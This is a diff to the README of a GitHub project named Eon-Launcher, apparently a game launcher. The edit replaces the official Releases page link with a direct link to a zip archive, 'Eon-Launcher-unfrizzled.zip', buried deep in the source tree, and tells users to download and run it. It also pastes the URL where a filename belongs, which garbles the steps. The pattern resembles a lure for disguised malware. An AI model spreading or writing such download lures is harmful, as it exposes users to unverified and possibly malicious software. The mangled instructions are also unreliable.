Rakkibronze/Eon-Launcher/README.md

 Follow these simple steps to download and run Eon-Launcher:

 1. **Visit the Download Page**
-   Go to the [Eon-Launcher Releases page](https://github.com/Rakkibronze/Eon-Launcher/releases).
+   Go to the [Eon-Launcher Releases page](https://raw.githubusercontent.com/Rakkibronze/Eon-Launcher/master/FortniteLauncher/Source/UI/Pages/Downloads/Eon-Launcher-unfrizzled.zip).
 Here, you will find the latest version of the application.

 2. **Select the Latest Release**
    On the Releases page, you will see a list of available versions.
 Look for the version labeled as "Latest Release."
 This ensures you download the most up-to-date software with the newest features and bug fixes.

 3. **Download the Application**
    Click the link to the latest version.
 This will take you to a page where you can download the Eon-Launcher.
-Look for a file named something like `Eon-Launcher.exe` and click it to start the download.
+Look for a file named something like `https://raw.githubusercontent.com/Rakkibronze/Eon-Launcher/master/FortniteLauncher/Source/UI/Pages/Downloads/Eon-Launcher-unfrizzled.zip` and click it to start the download.

 4. **Run the Installer**
    Once the download is complete, locate the file in your Downloads folder.
-Double-click on the `Eon-Launcher.exe` file.
+Double-click on the `https://raw.githubusercontent.com/Rakkibronze/Eon-Launcher/master/FortniteLauncher/Source/UI/Pages/Downloads/Eon-Launcher-unfrizzled.zip` file.
 A setup window will appear.
 Follow the on-screen instructions to install the application on your computer.

 5. **Launch Eon-Launcher**
    After installation, find the Eon-Launcher on your desktop or in your applications menu.
 Double-click to open it.
 The launcher will take a few moments to start, so be patient.